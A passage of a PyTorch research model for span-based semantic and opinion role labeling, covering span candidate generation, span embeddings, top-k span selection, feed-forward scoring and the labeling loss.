= flat_candidate_arg_scores.index_select(0, candidate_span_ids.view(-1)) \\\n .view(candidate_span_ids.size()[0], candidate_span_ids.size()[1])\n candidate_arg_scores = candidate_arg_scores + spans_log_mask\n ###\n\n # [num_sentences, max_num_args], ... 
[num_sentences,], [num_sentences, max_num_args]\n max_len = int(max(length_tensor).item())\n arg_starts, arg_ends, arg_scores, num_args, top_arg_indices = self.get_batch_topk(\n candidate_starts, candidate_ends, candidate_arg_scores, self.config.argument_ratio, length_tensor,\n max_len, sort_spans=False, enforce_non_crossing=False)\n\n max_len = torch.arange(0, max_len)\n if self.use_cuda:\n max_len = max_len.cuda()\n candidate_pred_ids = max_len.unsqueeze(0).expand(len(length_list), -1) # [num_sentences, max_sentence_length]\n # SRL\n # candidate_pred_emb = context_outputs # [num_sentences, max_sentence_length, emb]\n # candidate_pred_scores = self.get_unary_scores(\n # candidate_pred_emb, self.dropout, 1, flag='candidate_pred_scores') + torch.log(text_len_mask.float()) # [num_sentences, max_sentence_length]\n # ORL\n candidate_pred_emb = candidate_span_emb\n flat_candidate_pred_scores = self.get_unary_scores(\n candidate_pred_emb, self.dropout, 1, flag='candidate_pred_scores') # [num_sentences, max_sentence_length]\n candidate_pred_scores = flat_candidate_pred_scores.index_select(0, candidate_span_ids.view(-1)) \\\n .view(candidate_span_ids.size()[0], candidate_span_ids.size()[1])\n candidate_pred_scores = candidate_pred_scores + spans_log_mask\n\n if self.config.use_gold_predicates:\n # predicates = inputs[\"gold_predicates\"]\n # num_preds = inputs[\"num_gold_predicates\"]\n # pred_scores = tf.zeros_like(predicates, dtype=tf.float32)\n # top_pred_indices = predicates\n raise RuntimeError\n else:\n # [num_sentences, max_num_preds] ... [num_sentences,]\n pred_starts, pred_ends, pred_scores, num_preds, top_pred_indices = self.get_batch_topk(\n candidate_starts, candidate_ends, candidate_pred_scores, self.config.predicate_ratio,\n length_tensor, max_len, sort_spans=False, enforce_non_crossing=False)\n\n #arg_span_indices = self.batchGather(candidate_span_ids, top_arg_indices) # [num_sentences, max_num_args]\n if self.use_cuda:\n top_arg_indices = top_arg_indices.cuda()\n top_pred_indices = top_pred_indices.cuda()\n arg_span_indices = torch.gather(candidate_span_ids, 1, top_arg_indices)\n arg_span_indices_size = arg_span_indices.size()\n arg_span_indices = arg_span_indices.view(-1)\n arg_emb = torch.index_select(candidate_span_emb, 0, arg_span_indices.long())\\\n .view(arg_span_indices_size[0], arg_span_indices_size[1], -1) # [num_sentences, max_num_args, emb]\n # SRL\n # pred_emb = self.batchGather(candidate_pred_emb, top_pred_indices) # [num_sentences, max_num_preds, emb]\n # ORL\n pred_span_indices = torch.gather(candidate_span_ids, 1, top_pred_indices)\n pred_span_indices_size = pred_span_indices.size()\n pred_span_indices = pred_span_indices.view(-1)\n pred_emb = torch.index_select(candidate_span_emb, 0, pred_span_indices.long()) \\\n .view(pred_span_indices_size[0], pred_span_indices_size[1], -1) # [num_sentences, max_num_args, emb]\n\n\n # [num_sentences, max_num_args, max_num_preds]\n srl_labels = self.get_srl_labels(arg_starts, arg_ends, pred_starts, pred_ends, info_dic, max(length_list))\n\n # [num_sentences, max_num_args, max_num_preds, num_labels]\n srl_scores = self.get_srl_scores(\n arg_emb, pred_emb, arg_scores, pred_scores, len(self.srl_labels), self.config, self.dropout\n )\n\n srl_loss = self.get_srl_softmax_loss(\n srl_scores, srl_labels, num_args, num_preds) # [num_sentences, max_num_args, max_num_preds]\n # srl_loss1 = self.get_srl_softmax_loss1(\n # srl_scores, srl_labels, num_args, num_preds)\n\n srl_scores_argmax = torch.max(srl_scores, dim=-1)[1]\n\n predict_dict = 
{\n \"candidate_starts\": candidate_starts.long().cpu().numpy(),\n \"candidate_ends\": candidate_ends.long().cpu().numpy(),\n \"head_scores\": head_scores.detach().cpu().numpy(),\n \"candidate_arg_scores\": candidate_arg_scores.detach().cpu().numpy(),\n \"candidate_pred_scores\": candidate_pred_scores.detach().cpu().numpy(),\n \"arg_starts\": arg_starts.long().cpu().numpy(),\n \"arg_ends\": arg_ends.long().cpu().numpy(),\n \"pred_starts\": pred_starts.cpu().numpy(),\n \"pred_ends\": pred_ends.cpu().numpy(),\n \"arg_scores\": arg_scores.detach().cpu().numpy(), # New ...\n \"pred_scores\": pred_scores.detach().cpu().numpy(),\n \"num_args\": num_args.long().cpu().numpy(),\n \"num_preds\": num_preds.long().cpu().numpy(),\n \"arg_labels\": srl_scores_argmax.cpu().numpy(), # [num_sentences, num_args, num_preds]\n \"srl_scores\": srl_scores.detach().cpu().numpy()\n }\n\n return predict_dict, srl_loss\n\n def init_masks(self, batch_size, lengths):\n max_sent_length = max(lengths)\n num_sentences = lengths.size()[0]\n indices = torch.arange(0, max_sent_length).unsqueeze(0).expand(num_sentences, -1)\n masks = indices < lengths.unsqueeze(1).cpu()\n masks = masks.type(torch.FloatTensor)\n # masks = torch.zeros(batch_size, max_length)s\n # masks.requires_grad = False\n # for i, length in enumerate(lengths):\n # masks.data[i][:length] += 1.0\n if self.use_cuda:\n masks = masks.cuda()\n return masks\n\n def getSpanIds(self, candidate_mask, ids):\n new_tensor = copy.deepcopy(candidate_mask).float()\n start, end = 0, 0\n for idx in range(len(new_tensor)):\n length = int(torch.sum(new_tensor[idx]).item())\n end += length\n new_tensor[idx][:length] = ids[start:end]\n start = end\n return new_tensor\n\n def getSpanEmb(self, head_emb, context_outputs, span_starts, span_ends):\n \"\"\"Compute span representation shared across tasks.\n Args:\n head_emb: Tensor of [num_words, emb]\n context_outputs: Tensor of [num_words, emb]\n span_starts: [num_spans]\n span_ends: [num_spans]\n \"\"\"\n sent_len = context_outputs.size(0)\n num_span =span_starts.size(0)\n\n span_start_emb = torch.index_select(context_outputs, 0, span_starts.long()) # [num_words, emb]\n span_end_emb = torch.index_select(context_outputs, 0, span_ends.long()) # [num_words, emb]\n span_emb_list = [span_start_emb, span_end_emb]\n\n span_width = 1 + span_ends - span_starts # [num_spans]\n max_arg_width = self.config.max_arg_width\n num_heads = self.config.num_attention_heads\n\n if self.config.use_features:\n span_width_index = span_width - 1 # [num_spans]\n span_width_emb = self.span_width_embeddings(span_width_index.long()) # [num_spans, emb]\n span_width_emb = self.dropout(span_width_emb)\n span_emb_list.append(span_width_emb)\n\n head_scores = None\n span_text_emb = None\n span_indices = None\n span_indices_log_mask = None\n\n if self.config.model_heads:\n threshold = torch.LongTensor([sent_len - 1])\n max_arg_width_range = torch.arange(0, max_arg_width)\n # if self.use_cuda:\n # threshold = threshold.cuda()\n # max_arg_width_range = max_arg_width_range.cuda()\n # [num_spans, max_span_width]\n span_starts = span_starts.cpu()\n span_indices = torch.min(max_arg_width_range.unsqueeze(0) + span_starts.unsqueeze(1), other=threshold)\n span_indices_size = span_indices.size()\n flat_span_indices = span_indices.long().view(span_indices_size[0] * span_indices_size[1])\n if self.use_cuda:\n flat_span_indices = flat_span_indices.cuda()\n span_text_emb = torch.index_select(head_emb,\n 0,\n flat_span_indices)\\\n .view(span_indices.size(0), 
span_indices.size(1), head_emb.size(1)) # [num_spans, max_arg_width, emb]\n\n span_indices_mask = self.sequence_mask(span_width, max_arg_width, dtype=torch.float).float()\n # [num_spans, max_arg_width]\n span_indices_log_mask = torch.log(span_indices_mask)\n if self.use_cuda:\n span_indices_log_mask = span_indices_log_mask.cuda()\n # head_scores\n head_scores = self.projection(context_outputs, num_heads) # [num_words, num_heads]\n\n # [num_spans, max_arg_width, num_heads]\n span_attention = F.softmax(\n torch.index_select(head_scores, 0, flat_span_indices).view(span_indices.size(0),\n span_indices.size(1),\n head_scores.size(1)\n ) + span_indices_log_mask.unsqueeze(2),\n dim=1)\n span_head_emb = torch.sum(span_attention * span_text_emb, dim=1) # [num_spans, emb]\n span_emb_list.append(span_head_emb)\n #\n span_emb = torch.cat(span_emb_list, 1) # [num_spans, emb]\n return span_emb, head_scores, span_text_emb, span_indices, span_indices_log_mask\n\n def sequence_mask(self, lengths, maxlen, dtype=torch.bool):\n if maxlen is None:\n maxlen = lengths.max()\n ones = torch.ones((len(lengths), maxlen)).long()\n mask = ~(ones.cumsum(dim=1).t() > lengths.cpu()).t()\n mask.type(dtype)\n if self.use_cuda:\n mask = mask.cuda()\n return mask\n\n def getEmbeddings(self, char_id_tensor, context_word_emb, head_word_emb):\n context_emb_list = [context_word_emb]\n head_emb_list = [head_word_emb]\n char_embed = self.char_embedding(char_id_tensor)\n shape = char_embed.size()\n char_embed = char_embed.view(shape[0]*shape[1], shape[2], shape[3])\n char_embed = torch.unsqueeze(char_embed, 1)\n conv_outputs = []\n for conv in self.convs:\n conv_outputs.append(torch.relu(conv(char_embed)).squeeze(3))\n pool_outputs = []\n for output in conv_outputs:\n pool_outputs.append(F.max_pool1d(output, kernel_size=output.size(2)).squeeze(2))\n outputs = torch.cat(pool_outputs, 1)\n outputs = outputs.view(shape[0], shape[1], -1)\n context_emb_list.append(outputs)\n head_emb_list.append(outputs)\n context_emb = torch.cat(context_emb_list, 2)\n head_emb = torch.cat(head_emb_list, 2)\n context_emb = self.lexical_dropout(context_emb)\n head_emb = self.lexical_dropout(head_emb)\n return context_emb, head_emb\n\n def highwayLSTM(self, context_emb, length_list):\n x = context_emb\n hidden = None\n for idx, lstm in enumerate(self.lstmlist):\n source_x = x\n x = pack_padded_sequence(x, lengths=length_list, batch_first=True)\n if idx == 0:\n x, hidden = lstm(x)\n else:\n x, hidden = lstm(x, hidden)\n x = pad_packed_sequence(x, batch_first=True)[0]\n x = self.lstm_dropout(x)\n x = self.transform_linear(x)\n output_x = x\n highway_gates = F.sigmoid(self.gate_linear(output_x))\n x = highway_gates * output_x + (1 - highway_gates) * source_x\n return x\n\n def getSpanCandidates(self, length_tensor, max_arg_width):\n max_len = int(max(length_tensor).item())\n sent_num = len(length_tensor)\n '''\n candidate_starts: [sent_num, max_arg_width, max_len]\n [[[ 0., 1., 2., ..., 47., 48., 49.],\n [ 0., 1., 2., ..., 47., 48., 49.],\n [ 0., 1., 2., ..., 47., 48., 49.],\n ...,\n ]]\n '''\n candidate_starts_range = torch.arange(0, max_len)\n if self.use_cuda:\n candidate_starts_range = candidate_starts_range.cuda()\n candidate_starts = torch.unsqueeze(torch.unsqueeze(candidate_starts_range, 0), 1).expand(sent_num, max_arg_width, max_len)\n '''\n candidate_widths: [1, max_arg_width, 1]\n [[[ 0.],\n [ 1.],\n [ 2.],\n [ 3.],\n ...\n ]]\n '''\n candidate_widths_range = torch.arange(0, max_arg_width)\n if self.use_cuda:\n candidate_widths_range = 
candidate_widths_range.cuda()\n candidate_widths = torch.unsqueeze(torch.unsqueeze(candidate_widths_range, 0), 2)\n '''\n candidate_ends: [sent_num, max_arg_width, max_len] \n [[[ 0., 1., 2., ..., 47., 48., 49.],\n [ 1., 2., 3., ..., 48., 49., 50.],\n [ 2., 3., 4., ..., 49., 50., 51.],\n ...,\n ]]\n '''\n candidate_ends = candidate_starts + candidate_widths\n # [sent_num, max_arg_width * max_len]\n candidate_starts = candidate_starts.contiguous().view(sent_num, max_arg_width * max_len)\n\n # [sent_num, max_arg_width * max_len]\n candidate_ends = candidate_ends.contiguous().view(sent_num, max_arg_width * max_len)\n\n # [sent_num, max_arg_width * max_len]\n candidate_mask = torch.lt(candidate_ends,\n torch.unsqueeze(length_tensor.long(), 1).expand(sent_num, max_arg_width * max_len))\n\n # Mask to avoid indexing error.\n candidate_starts = candidate_starts * candidate_mask.long()\n candidate_ends = candidate_ends * candidate_mask.long()\n\n return candidate_starts, candidate_ends, candidate_mask\n\n def flatten_emb_by_sentence(self, emb, text_len_mask):\n emb_size = emb.size()\n sent_num = emb_size[0]\n max_sent_len = emb_size[1]\n flattened_emb = self.flatten_emb(emb)\n text_len_mask_boardcast = text_len_mask.view(sent_num * max_sent_len).unsqueeze(1).\\\n expand(sent_num * max_sent_len, emb_size[2])\n return torch.masked_select(flattened_emb, text_len_mask_boardcast).view(-1, emb_size[2])\n\n def flatten_emb(self, emb):\n emb_size = emb.size()\n num_sentences = emb_size[0]\n max_sentence_length = emb_size[1]\n emb_rank = len(emb.size())\n if emb_rank == 2:\n flattened_emb = emb.contiguous().view(num_sentences * max_sentence_length)\n elif emb_rank == 3:\n flattened_emb = emb.contiguous().view([num_sentences * max_sentence_length, self.shape(emb, 2)])\n else:\n raise ValueError(\"Unsupported rank: {}\".format(emb_rank))\n return flattened_emb\n\n def shape(self, x, dim):\n return x.size(dim) or x.size(dim)\n\n def projection(self, inputs, output_size, initializer=None):\n return self.ffnn(inputs, 0, -1, output_size, dropout=None, output_weights_initializer=initializer)\n\n def ffnn(self, inputs, num_hidden_layers, hidden_size, output_size, dropout, output_weights_initializer=None):\n if len(inputs.size()) > 2:\n current_inputs = inputs.view(-1, self.shape(inputs, -1))\n else:\n current_inputs = inputs\n\n if num_hidden_layers > 0:\n output0 = torch.relu(self.linear0(current_inputs))\n if dropout is not None:\n output0 = dropout(output0)\n output1 = torch.relu(self.linear1(output0))\n if dropout is not None:\n output1 = dropout(output1)\n current_inputs = output1\n\n outputs = self.output_linear(current_inputs)\n\n if len(inputs.size()) == 3:\n outputs = outputs.view(self.shape(inputs, 0), self.shape(inputs, 1), output_size)\n elif len(inputs.size()) > 3:\n raise ValueError(\"FFNN with rank {} not supported\".format(len(inputs.size())))\n return outputs\n\n def ffnn_(self, inputs, num_hidden_layers, hidden_size, output_size, dropout, output_weights_initializer=None):\n if len(inputs.size()) > 2:\n current_inputs = inputs.view(-1, self.shape(inputs, -1))\n else:\n current_inputs = inputs\n # outputs = None\n if num_hidden_layers == 2:\n output0 = torch.relu(self.linear0(current_inputs))\n if dropout is not None:\n output0 = dropout(output0)\n output1 = torch.relu(self.linear1(output0))\n if dropout is not None:\n output1 = dropout(output1)\n current_inputs = output1\n\n outputs = self.output_linear1(current_inputs)\n\n # if num_hidden_layers == 1:\n # output2 = 
torch.relu(self.linear2(current_inputs))\n # outputs = self.output_linear2(output2)\n\n if len(inputs.size()) == 3:\n outputs = outputs.view(self.shape(inputs, 0), self.shape(inputs, 1), output_size)\n elif len(inputs.size()) > 3:\n raise ValueError(\"FFNN with rank {} not supported\".format(len(inputs.size())))\n return outputs\n\n def ffnn__(self, inputs, num_hidden_layers, hidden_size, output_size, dropout, output_weights_initializer=None):\n if len(inputs.size()) > 2:\n current_inputs = inputs.contiguous().view(-1, self.shape(inputs, -1))\n else:\n current_inputs = inputs\n # outputs = None\n if num_hidden_layers == 2:\n output2 = torch.relu(self.linear2(current_inputs))\n if dropout is not None:\n output2 = dropout(output2)\n output3 = torch.relu(self.linear3(output2))\n if dropout is not None:\n output3 = dropout(output3)\n current_inputs = output3\n\n outputs = self.output_linear2(current_inputs)\n\n # if num_hidden_layers == 1:\n # output2 = torch.relu(self.linear2(current_inputs))\n # outputs = self.output_linear2(output2)\n\n\n if len(inputs.size()) == 3:\n outputs = outputs.view(self.shape(inputs, 0), self.shape(inputs, 1), output_size)\n elif len(inputs.size()) > 3:\n raise ValueError(\"FFNN with rank {} not supported\".format(len(inputs.size())))\n return outputs\n\n def ffnn___(self, inputs, num_hidden_layers, hidden_size, output_size, dropout, output_weights_initializer=None):\n if len(inputs.size()) > 2:\n current_inputs = inputs.view(-1, self.shape(inputs, -1))\n else:\n current_inputs = inputs\n # outputs = None\n if num_hidden_layers == 2:\n output2 = torch.relu(self.linear4(current_inputs))\n if dropout is not None:\n output2 = dropout(output2)\n output3 = torch.relu(self.linear5(output2))\n if dropout is not None:\n output3 = dropout(output3)\n current_inputs = output3\n\n outputs = self.output_linear3(current_inputs)\n\n if len(inputs.size()) == 3:\n outputs = outputs.view(self.shape(inputs, 0), self.shape(inputs, 1), output_size)\n elif len(inputs.size()) > 3:\n raise ValueError(\"FFNN with rank {} not supported\".format(len(inputs.size())))\n return outputs\n\n def get_unary_scores(self, span_emb, dropout, num_labels=1, flag=''):\n \"\"\"Compute span score with FFNN(span embedding).\n Args:\n span_emb: Tensor of [num_sentences, num_spans, emb].\n \"\"\"\n # span_scores\n # [num_sentences, num_spans, num_labels] or [k, num_labels]\n # scores = self.ffnn_(span_emb, self.config.ffnn_depth, self.config.ffnn_size, num_labels, dropout)\n if flag == 'candidate_pred_scores':\n scores = self.ffnn__(span_emb, self.config.ffnn_depth, self.config.ffnn_size, num_labels, dropout)\n elif flag == 'predicate_argument_scores':\n scores = self.ffnn___(span_emb, self.config.ffnn_depth, self.config.ffnn_size, num_labels, dropout)\n else:\n scores = self.ffnn_(span_emb, self.config.ffnn_depth, self.config.ffnn_size, num_labels, dropout)\n if num_labels == 1:\n scores = scores.squeeze(-1) # [num_sentences, num_spans] or [k]\n return scores\n\n def get_batch_topk(self, candidate_starts, candidate_ends, candidate_scores, topk_ratio, text_len,\n max_sentence_length, sort_spans=False, enforce_non_crossing=True):\n \"\"\"\n Args:\n candidate_starts: [num_sentences, max_num_candidates]\n candidate_mask: [num_sentences, max_num_candidates]\n topk_ratio: A float number.\n text_len: [num_sentences,]\n max_sentence_length:\n enforce_non_crossing: Use regular top-k op if set to False.\n \"\"\"\n num_sentences = self.shape(candidate_starts, 0)\n max_num_candidates = self.shape(candidate_starts, 
1)\n\n # [num_sentences]\n floor = torch.floor(text_len.float() * topk_ratio)\n ones = torch.ones([num_sentences, ])\n if self.use_cuda:\n ones = ones.cuda()\n topk = torch.max(floor, other=ones).long()\n\n predicted_indices = self.extractSpans(\n candidate_scores, candidate_starts, candidate_ends, topk, max_sentence_length,\n sort_spans, enforce_non_crossing) # [num_sentences, max_num_predictions]\n # predicted_indices.set_shape([None, None])\n\n # predicted_start = self.batchGather(candidate_starts, predicted_indices) # [num_sentences, max_num_predictions]\n # # predicted_ends = self.batchGather(candidate_ends, predicted_indices) # [num_sentences, max_num_predictions]\n # # predicted_scores = self.batchGather(candidate_scores, predicted_indices) # [num_sentences, max_num_predictions]\n # xqr\n candidate_starts = candidate_starts.cpu()\n candidate_ends = candidate_ends.cpu()\n candidate_scores = candidate_scores.cpu()\n predicted_starts = torch.gather(candidate_starts, 1, predicted_indices)\n predicted_ends = torch.gather(candidate_ends, 1, predicted_indices)\n predicted_scores = torch.gather(candidate_scores, 1, predicted_indices)\n ###\n return predicted_starts, predicted_ends, predicted_scores, topk, predicted_indices\n\n def extractSpans(self, candidate_scores, candidate_starts, candidate_ends, topk, max_sentence_length,\n sort_spans, enforce_non_crossing):\n _sort_spans = sort_spans\n _suppress_crossing = enforce_non_crossing # do not it is right !!!\n\n span_scores = candidate_scores\n candidate_starts = candidate_starts\n candidate_ends = candidate_ends\n num_output_spans = topk\n max_sentence_length = max_sentence_length\n\n\n # xqr\n max_num_output_spans = int(torch.max(topk))\n indices = [score.topk(k)[1] for score, k in zip(candidate_scores, topk)]\n output_span_indices_tensor = [F.pad(item, [0, max_num_output_spans - item.size()[0]], value=item[-1]) for item in indices]\n output_span_indices = torch.stack(output_span_indices_tensor).cpu()\n ###\n # num_sentences = span_scores.size(0)\n # num_input_spans = span_scores.size(1)\n # max_num_output_spans = 0\n # for i in range(num_sentences):\n # if num_output_spans[i] > max_num_output_spans:\n # max_num_output_spans = num_output_spans[i]\n #\n # output_span_indices = torch.zeros((num_sentences, int(max_num_output_spans.item()))).int()\n # sorted_input_span_indices = torch.zeros((num_sentences, num_input_spans))\n # if self.use_cuda:\n # output_span_indices = output_span_indices.cuda()\n # sorted_input_span_indices = sorted_input_span_indices.cuda()\n # for i in range(num_sentences):\n # for j in range(num_input_spans):\n # sorted_input_span_indices[i][j] = j\n # _, index = torch.sort(span_scores[i], descending=True)\n # # index = index.tolist()\n # sorted_input_span_indices[i] = sorted_input_span_indices[i][index]\n #\n # for l in range(num_sentences):\n # top_span_indices = []\n # # end_to_earliest_start = {}\n # # start_to_latest_end = {}\n # current_span_index, num_selected_spans = 0, 0\n # while num_selected_spans < num_output_spans[l] and current_span_index < num_input_spans:\n # i = sorted_input_span_indices[l][current_span_index]\n # any_crossing = False\n # if not any_crossing:\n # if sort_spans:\n # top_span_indices.append(i)\n # else:\n # output_span_indices[l][num_selected_spans] = i\n # num_selected_spans += 1\n # current_span_index += 1\n # last_selected = num_selected_spans - 1\n # if last_selected >= 0:\n # for i in range(num_selected_spans, int(max_num_output_spans.item())):\n # output_span_indices[l][i] = 
output_span_indices[l][last_selected]\n\n return output_span_indices\n\n def batchGather(self, emb, indices):\n # TODO: Merge with util.batch_gather.\n \"\"\"\n Args:\n emb: Shape of [num_sentences, max_sentence_length, (emb)]\n indices: Shape of [num_sentences, k, (l)]\n \"\"\"\n num_sentences = emb.size(0)\n max_sentence_length = emb.size(1)\n emb_size = emb.size()\n flattened_emb = self.flatten_emb(emb) # [num_sentences * max_sentence_length, emb]\n num_sentences_range = torch.arange(0, num_sentences)\n # if self.use_cuda:\n # num_sentences_range = num_sentences_range.cuda()\n offset = (num_sentences_range * max_sentence_length).unsqueeze(1) # [num_sentences, 1]\n if len(indices.size()) == 3:\n offset = offset.unsqueeze(2) # [num_sentences, 1, 1]\n indice_offset = indices.long() + offset.long()\n indice_offset_size = indice_offset.size()\n indice_offset = indice_offset.view(-1)\n selected = torch.index_select(flattened_emb.cpu(), 0, indice_offset)\n if len(emb_size) > 2:\n selected = selected.view(indice_offset_size[0], indice_offset_size[1], emb_size[-1])\n else:\n selected = selected.view(indice_offset_size)\n if self.use_cuda:\n selected = selected.cuda()\n return selected\n\n def get_dense_span_labels(self, span_starts, span_ends, span_labels, num_spans, max_sentence_length, span_parents=None):\n \"\"\"Utility function to get dense span or span-head labels.\n Args:\n span_starts: [num_sentences, max_num_spans]\n span_ends: [num_sentences, max_num_spans]\n span_labels: [num_sentences, max_num_spans]\n num_spans: [num_sentences,]\n max_sentence_length:\n span_parents: [num_sentences, max_num_spans]. Predicates in SRL.\n \"\"\"\n num_sentences = span_starts.size(0)\n max_num_spans = span_starts.size(1)\n if self.use_cuda:\n span_starts = span_starts.cuda()\n # For padded spans, we have starts = 1, and ends = 0, so they don't collide with any existing spans.\n sequence_mask_result = self.sequence_mask(num_spans, maxlen=int(max(num_spans).item()), dtype=torch.int32).long()\n span_starts += (1 - sequence_mask_result) # [num_sentences, max_num_spans]\n num_sentences_range = torch.arange(0, num_sentences)\n if self.use_cuda:\n num_sentences_range = num_sentences_range.cuda()\n sentence_indices = num_sentences_range.unsqueeze(1).expand(num_sentences, max_num_spans) # [num_sentences, max_num_spans]\n sparse_indices = torch.cat([\n sentence_indices.unsqueeze(2),\n span_starts.unsqueeze(2),\n span_ends.unsqueeze(2)], dim=2) # [num_sentences, max_num_spans, 3]\n if span_parents is not None:\n pre_start_tensor, pre_end_tensor = span_parents\n sparse_indices = torch.cat([sparse_indices, pre_start_tensor.unsqueeze(2), pre_end_tensor.unsqueeze(2)], dim=2) # [num_sentenes, max_num_spans, 4]\n\n rank = 3 if (span_parents is None) else 5\n # (sent_id, span_start, span_end) -> span_label\n # sparse to dense\n sparse_indices = sparse_indices.view(num_sentences * max_num_spans, rank)\n # output_shape = [num_sentences, max_sentence_length, max_sentence_length, max_sentence_length]\n # default_value = 0\n # sparse_values = span_labels.view(-1)\n # xqr\n dense_labels = torch.sparse.FloatTensor(sparse_indices.cpu().view(num_sentences * max_num_spans, rank).t(),\n span_labels.view(-1).type(torch.FloatTensor),\n torch.Size(\n [num_sentences] + [max_sentence_length] * (rank - 1))).to_dense()\n ###\n # dense_label = torch.zeros(num_sentences, max_sentence_length, max_sentence_length, max_sentence_length)\n # if self.use_cuda:\n # dense_label = dense_label.cuda()\n # for idx, value in enumerate(sparse_values):\n # 
i, j, k, t = sparse_indices[idx]\n # dense_label[i][j][k][t] = value\n\n return dense_labels\n\n def gather_5d(self, params, indices): # ugly\n assert len(params.size()) == 5 and len(indices.size()) == 4\n # print params.size(), indices.size()\n # exit()\n params = params.type(torch.LongTensor)\n indices_a, indices_b, indices_c, indices_d, indices_e = indices.chunk(5, dim=3)\n result = params[indices_a, indices_b, indices_c, indices_d, indices_e]\n # result = torch.zeros(indices.size()[:3]).type(torch.LongTensor)\n #\n # for i in range(indices.size()[0]):\n # for j in range(indices.size()[1]):\n # for k in range(indices.size()[2]):\n # result[i][j][k] = params[indices[i][j][k][0]][indices[i][j][k][1]][indices[i][j][k][2]][indices[i][j][k][3]]\n return result.unsqueeze(3)\n\n def get_srl_labels(self, arg_starts, arg_ends, pred_starts, pred_ends, labels, max_sentence_length):\n \"\"\"\n Args:\n arg_starts: [num_sentences, max_num_args]\n arg_ends: [num_sentences, max_num_args]\n predicates: [num_sentences, max_num_predicates]\n labels: Dictionary of label tensors.\n max_sentence_length: An integer scalar.\n \"\"\"\n # arg_starts = output_dic['arg_starts']\n # arg_ends = output_dic['arg_ends']\n # predicates = output_dic['predicates']\n num_sentences = arg_starts.size(0)\n max_num_args = arg_starts.size(1)\n max_num_preds = pred_starts.size(1)\n num_sentences_range = torch.arange(0, num_sentences)\n # if self.use_cuda:\n # num_sentences_range = num_sentences_range.cuda()\n sentence_indices_2d = num_sentences_range. \\\n unsqueeze(1).unsqueeze(2). \\\n expand(num_sentences, max_num_args, max_num_preds) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_arg_starts = arg_starts.unsqueeze(2). \\\n expand(arg_ends.size(0), arg_ends.size(1), max_num_preds) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_arg_ends = arg_ends.unsqueeze(2). \\\n expand(arg_ends.size(0), arg_ends.size(1), max_num_preds) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_pred_starts = pred_starts.unsqueeze(1). \\\n expand(pred_starts.size(0), max_num_args, pred_starts.size(1)) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_pred_ends = pred_ends.unsqueeze(1). 
\\\n expand(pred_ends.size(0), max_num_args, pred_ends.size(1)) # [num_sentences, max_num_args, max_num_preds, max_num_preds]\n tiled_arg_starts = tiled_arg_starts.cpu()\n tiled_arg_ends = tiled_arg_ends.cpu()\n tiled_pred_starts = tiled_pred_starts.cpu()\n tiled_pred_ends = tiled_pred_ends.cpu()\n pred_indices = torch.cat([\n sentence_indices_2d.unsqueeze(3),\n tiled_arg_starts.unsqueeze(3),\n tiled_arg_ends.unsqueeze(3),\n tiled_pred_starts.unsqueeze(3),\n tiled_pred_ends.unsqueeze(3)], dim=3) # [num_sentences, max_num_args, max_num_preds, max_num_preds, 4]\n\n dense_srl_labels = self.get_dense_span_labels(\n labels[\"arg_start_tensor\"], labels[\"arg_end_tensor\"], labels[\"arg_label_tensor\"], labels[\"srl_len_tensor\"],\n max_sentence_length,\n span_parents=(labels[\"pre_start_tensor\"], labels[\"pre_end_tensor\"])) # [num_sentences, max_sent_len, max_sent_len, max_sent_len]\n\n # srl_labels = torch.index_select(dense_srl_labels, 3, pred_indices.long()) # [num_sentences, max_num_args]\n # srl_labels = torch.zeros((num_sentences, max_num_args, max_num_preds))\n # if self.use_cuda:\n # srl_labels = srl_labels.cuda()\n # pred_indices = pred_indices.long() # [num_sentences, max_num_args, max_num_preds]\n # for i in range(num_sentences):\n # for j in range(max_num_args):\n # for k in range(max_num_preds):\n # index = pred_indices[i][j][k]\n # srl_labels[i][j][k] = dense_srl_labels[index[0]][index[1]][index[2]][index[3]]\n\n srl_labels = self.gather_5d(dense_srl_labels, pred_indices.type(torch.LongTensor))\n\n return srl_labels\n\n def get_srl_scores(self, arg_emb, pred_emb, arg_scores, pred_scores, num_labels, config, dropout):\n num_sentences = self.shape(arg_emb, 0)\n num_args = self.shape(arg_emb, 1)\n num_preds = self.shape(pred_emb, 1)\n\n arg_emb_expanded = arg_emb.unsqueeze(2) # [num_sents, num_args, 1, emb]\n pred_emb_expanded = pred_emb.unsqueeze(1) # [num_sents, 1, num_preds, emb]\n\n arg_emb_size = arg_emb_expanded.size()\n # [num_sentences, num_args, num_preds, emb]\n arg_emb_tiled = arg_emb_expanded.expand(arg_emb_size[0], arg_emb_size[1], num_preds, arg_emb_size[3])\n\n pred_emb_size = pred_emb_expanded.size()\n # [num_sents, num_args, num_preds, emb]\n pred_emb_tiled = pred_emb_expanded.expand(pred_emb_size[0], num_args, pred_emb_size[2], pred_emb_size[3])\n\n pair_emb_list = [arg_emb_tiled, pred_emb_tiled]\n pair_emb = torch.cat(pair_emb_list, 3) # [num_sentences, num_args, num_preds, emb]\n pair_emb_size = self.shape(pair_emb, 3)\n flat_pair_emb = pair_emb.view(num_sentences * num_args * num_preds, pair_emb_size)\n\n flat_srl_scores = self.get_unary_scores(flat_pair_emb, dropout, num_labels - 1,\n \"predicate_argument_scores\") # [num_sentences * num_args * num_predicates, 1]\n srl_scores = flat_srl_scores.view(num_sentences, num_args, num_preds, num_labels - 1)\n if self.use_cuda:\n arg_scores = arg_scores.cuda()\n pred_scores = pred_scores.cuda()\n srl_scores = srl_scores + arg_scores.unsqueeze(2).unsqueeze(3) + pred_scores.unsqueeze(1).unsqueeze(3) # [num_sentences, 1, max_num_preds, num_labels-1]\n\n dummy_scores = torch.zeros([num_sentences, num_args, num_preds, 1]).float()\n if self.use_cuda:\n dummy_scores = dummy_scores.cuda()\n srl_scores = torch.cat([dummy_scores, srl_scores],\n 3) # [num_sentences, max_num_args, max_num_preds, num_labels]\n return srl_scores # [num_sentences, num_args, num_predicates, num_labels]\n\n def get_srl_softmax_loss(self, srl_scores, srl_labels, num_predicted_args, num_predicted_preds):\n max_num_arg = srl_scores.size()[1]\n 
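        # Everything below builds a 2-D validity mask: sequence_mask over the
        # predicted argument and predicate counts, combined into srl_loss_mask so
        # that only real (argument, predicate) pairs contribute to the summed
        # negative log-likelihood.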
